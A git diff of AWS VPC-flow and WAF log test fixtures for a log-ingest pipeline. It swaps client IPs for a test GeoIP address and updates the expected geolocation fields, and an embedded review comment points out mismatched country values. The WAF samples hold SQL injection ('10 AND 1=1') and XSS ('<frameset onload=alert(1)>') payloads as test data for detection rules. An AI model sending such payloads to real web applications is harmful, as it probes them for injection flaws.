@@ -286,13 +322,13 @@ }, "related": { "ip": [ - "78.24.182.42", - "158.109.0.1" + "89.160.20.156", + "89.160.20.156" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075060Z", - "original": "2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", + "ingested": "2021-12-09T16:12:00.503409900Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", "kind": "event", "start": "2014-12-14T04:06:50.000Z", "end": "2014-12-14T04:07:50.000Z", @@ -317,17 +353,35 @@ "ip": "172.31.16.139" }, "source": { - "address": "203.0.113.12", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", "port": 0, "bytes": 336, - "packets": 4, - "ip": "203.0.113.12" + "ip": "89.160.20.156", + "packets": 4 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:H//CCQJhRqDUJ9c23S0VrQ+drxU=", + "community_id": "1:cttDCHp3UNR8SFNTOgVYpAceHf4=", "type": "ipv4", "bytes": 336, "iana_number": "1", @@ -345,13 +399,13 @@ }, "related": { "ip": [ - "203.0.113.12", + "89.160.20.156", "172.31.16.139" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075068700Z", - "original": "2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", + "ingested": "2021-12-09T16:12:00.503416200Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", "kind": "event", "start": "2015-05-29T16:30:27.000Z", "end": "2015-05-29T16:32:22.000Z", 
@@ -371,9 +425,27 @@ }, { "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", "port": 0, - "address": "203.0.113.12", - "ip": "203.0.113.12" + "ip": "89.160.20.156" }, "source": { "address": "172.31.16.139", @@ -386,7 +458,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cfQqw/Kh6+4yqhEKgkCw/m3WoJM=", + "community_id": "1:XiVZKra6oEtIAPBi9QgeQL4Hp6M=", "type": "ipv4", "bytes": 336, "iana_number": "1", @@ -405,12 +477,12 @@ "related": { "ip": [ "172.31.16.139", - "203.0.113.12" + "89.160.20.156" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075122200Z", - "original": "2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK", + "ingested": "2021-12-09T16:12:00.503420100Z", + "original": "2 123456789010 eni-1235b8ca123456789 172.31.16.139 89.160.20.156 0 0 1 4 336 1432917094 1432917142 REJECT OK", "kind": "event", "start": "2015-05-29T16:31:34.000Z", "end": "2015-05-29T16:32:22.000Z", diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log index 6570debd565..94b874fa6a8 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log 
@@ -1,3 +1,3 @@
-3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43416 5001 52.213.180.42 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK
+3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 89.160.20.156 10.0.0.62 43416 5001 89.160.20.156 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK
 3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - SKIPDATA
 3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - NODATA
\ No newline at end of file
diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json
index f6c047e28ae..cca3b2323c2 100644
--- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json
+++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json
@@ -9,33 +9,33 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "IE-L", - "city_name": "Dublin", - "country_iso_code": "IE", - "country_name": "Ireland", - "region_name": "Leinster", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -6.2488, - "lat": 53.3338 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 16509, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.213.180.42", + "address": "89.160.20.156", "port": 43416, "bytes": 568, - "ip": "52.213.180.42", + "ip": "89.160.20.156", "packets": 8 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:HQ1oJYZ+9SJOoeju7badiLfvwls=", + "community_id": "1:dF5WY79X1yVncj+yH8q27Q5Bnpk=", "transport": "tcp", "type": "ipv4", "bytes": 568, @@ -57,13 +57,13 @@ }, "related": { "ip": [ - "52.213.180.42", + "89.160.20.156", "10.0.0.62" ] }, "event": { - "ingested": "2021-09-28T19:10:43.764548200Z", - "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43416 5001 52.213.180.42 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK", + "ingested": "2021-12-09T16:12:01.346119700Z", + "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 89.160.20.156 10.0.0.62 43416 5001 89.160.20.156 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK", "kind": "event", "start": "2019-08-26T19:47:55.000Z", "end": "2019-08-26T19:48:53.000Z", @@ -77,7 +77,7 @@ "syn" ], "vpc_id": "vpc-abcdefab012345678", - "pkt_srcaddr": "52.213.180.42", + "pkt_srcaddr": "89.160.20.156", "type": "IPv4", "version": "3", "instance_id": "i-01234567890123456", 
@@ -106,7 +106,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-28T19:10:43.764574400Z", + "ingested": "2021-12-09T16:12:01.346125500Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - SKIPDATA", "kind": "event", "start": "2019-08-26T19:47:55.000Z", @@ -144,7 +144,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-28T19:10:43.764597700Z", + "ingested": "2021-12-09T16:12:01.346129200Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - NODATA", "kind": "event", "start": "2019-08-26T19:47:55.000Z", diff --git a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log index e741cc6f2bd..774353168e4 100644 --- a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log +++ b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log 
@@ -1,4 +1,4 @@
-{"timestamp":1576280412771,"formatVersion":1,"webaclId":"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE","terminatingRuleId":"STMTest_SQLi_XSS","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","AND","1"]}],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"1.1.1.1","country":"AU","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"x-stm-test","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]}
-{"timestamp":1592357192516,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","terminatingRuleMatchDetails":[],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[{"ruleId":"TestRule","action":"COUNT","ruleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","and","1"]}]}],"httpRequest":{"clientIp":"3.3.3.3","country":"US","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"foo","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]}
-{"timestamp":1592361810888,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9","terminatingRuleId":"RG-Reference","terminatingRuleType":"GROUP","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"XSS","location":"HEADER","matchedData":["<","frameset"]}],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[{"ruleGroupId":"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b","terminatingRule":{"ruleId":"RuleA-XSS","action":"BLOCK","ruleMatchDetails":null},"nonTerminatingMatchingRules":[{"ruleId":"RuleB-SQLi","action":"COUNT","ruleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","and","1"]}]}],"excludedRules":null}],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"3.3.3.3","country":"US","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"xssfoo","value":""},{"name":"bar","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]}
-{"timestamp":1576280412771,"formatVersion":1,"webaclId":"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111","terminatingRuleId":"STMTest_SQLi_XSS","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"UNKNOWN","matchedData":["10","AND","1"]}],"httpSourceName":"ALB","httpSourceId":"alb","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"requestHeadersInserted":null,"responseCodeSent":null,"httpRequest":{"clientIp":"1.1.1.1","country":"AU","headers":[],"uri":"","args":"","httpVersion":"HTTP/1.1","httpMethod":"POST","requestId":"null"},"labels":[{"name":"value"}]}
\ No newline at end of file
+{"timestamp":1576280412771,"formatVersion":1,"webaclId":"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE","terminatingRuleId":"STMTest_SQLi_XSS","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","AND","1"]}],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"89.160.20.156","country":"AU","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"x-stm-test","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]}
+{"timestamp":1592357192516,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","terminatingRuleMatchDetails":[],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[{"ruleId":"TestRule","action":"COUNT","ruleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","and","1"]}]}],"httpRequest":{"clientIp":"89.160.20.156","country":"US","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"foo","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]}
+{"timestamp":1592361810888,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9","terminatingRuleId":"RG-Reference","terminatingRuleType":"GROUP","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"XSS","location":"HEADER","matchedData":["<","frameset"]}],"httpSourceName":"-","httpSourceId":"-","ruleGroupList":[{"ruleGroupId":"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b","terminatingRule":{"ruleId":"RuleA-XSS","action":"BLOCK","ruleMatchDetails":null},"nonTerminatingMatchingRules":[{"ruleId":"RuleB-SQLi","action":"COUNT","ruleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"HEADER","matchedData":["10","and","1"]}]}],"excludedRules":null}],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"89.160.20.156","country":"US","headers":[{"name":"Host","value":"localhost:1989"},{"name":"User-Agent","value":"curl/7.61.1"},{"name":"Accept","value":"*/*"},{"name":"xssfoo","value":""},{"name":"bar","value":"10 AND 1=1"}],"uri":"/foo","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"rid"},"labels":[{"name":"value"}]}
+{"timestamp":1576280412771,"formatVersion":1,"webaclId":"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111","terminatingRuleId":"STMTest_SQLi_XSS","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"UNKNOWN","matchedData":["10","AND","1"]}],"httpSourceName":"ALB","httpSourceId":"alb","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"requestHeadersInserted":null,"responseCodeSent":null,"httpRequest":{"clientIp":"89.160.20.156","country":"AU","headers":[],"uri":"","args":"","httpVersion":"HTTP/1.1","httpMethod":"POST","requestId":"null"},"labels":[{"name":"value"}]}
\ No newline at end of file
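Review bot: The WAF-reported `"country"` field on all four new lines still says AU or US while the same client IP 89.160.20.156 is resolved to SE in the expected output, so the fixture now contradicts itself. A self-contradicting sample cannot catch a regression in whichever source the pipeline prefers for `source.geo`; the expected file shows GeoIP winning today, but whether `httpRequest.country` is mapped anywhere is not visible in this hunk. Setting `"country":"SE"` on the four lines keeps the sample plausible with no effect on the asserted output unless that field is in fact mapped. Giving every event the same address also loses the original two-client distinction; 81.2.69.144, used by the Azure fixture elsewhere in this change, is another address from the supported subset that could serve the two hello-world events.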
diff --git a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json index 1bc74f3bac2..b2240aa9ada 100644 --- a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json +++ b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json @@ -7,21 +7,24 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "url": { "path": "/foo" @@ -48,7 +51,7 @@ }, "related": { "ip": [ - "1.1.1.1" + "89.160.20.156" ] }, "http": { 
@@ -60,8 +63,8 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-10-11T15:00:35.544809626Z", - "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"1.1.1.1\",\"country\":\"AU\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"x-stm-test\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", + "ingested": "2021-12-09T16:12:01.711621Z", + "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"AU\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"x-stm-test\",\"value\":\"10 AND 
1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ "access", @@ -102,18 +105,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" } }, - "ip": "3.3.3.3" + "ip": "89.160.20.156" }, "url": { "path": "/foo" @@ -140,7 +149,7 @@ }, "related": { "ip": [ - "3.3.3.3" + "89.160.20.156" ] }, "http": { 
@@ -152,8 +161,8 @@ }, "event": { "action": "ALLOW", - "ingested": "2021-10-11T15:00:35.544814315Z", - "original": "{\"timestamp\":1592357192516,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"Default_Action\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"ALLOW\",\"terminatingRuleMatchDetails\":[],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[{\"ruleId\":\"TestRule\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"httpRequest\":{\"clientIp\":\"3.3.3.3\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"foo\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", + "ingested": "2021-12-09T16:12:01.711626900Z", + "original": 
"{\"timestamp\":1592357192516,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"Default_Action\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"ALLOW\",\"terminatingRuleMatchDetails\":[],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[{\"ruleId\":\"TestRule\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"foo\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ "access", @@ -200,18 +209,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": 17.8167, + "lat": 59.2 } }, - "ip": "3.3.3.3" + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "ip": "89.160.20.156" }, "url": { "path": "/foo" @@ -238,7 +253,7 @@ }, "related": { "ip": [ - "3.3.3.3" + "89.160.20.156" ] }, "http": { 
@@ -250,8 +265,8 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-10-11T15:00:35.544816392Z", - "original": "{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"\u003c\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"3.3.3.3\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\u003cframeset onload=alert(1)\u003e\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", + "ingested": "2021-12-09T16:12:01.711632900Z", + "original": 
"{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"\u003c\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\u003cframeset onload=alert(1)\u003e\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ "access", 
@@ -318,21 +333,24 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -356,7 +374,7 @@ }, "related": { "ip": [ - "1.1.1.1" + "89.160.20.156" ] }, "http": { 
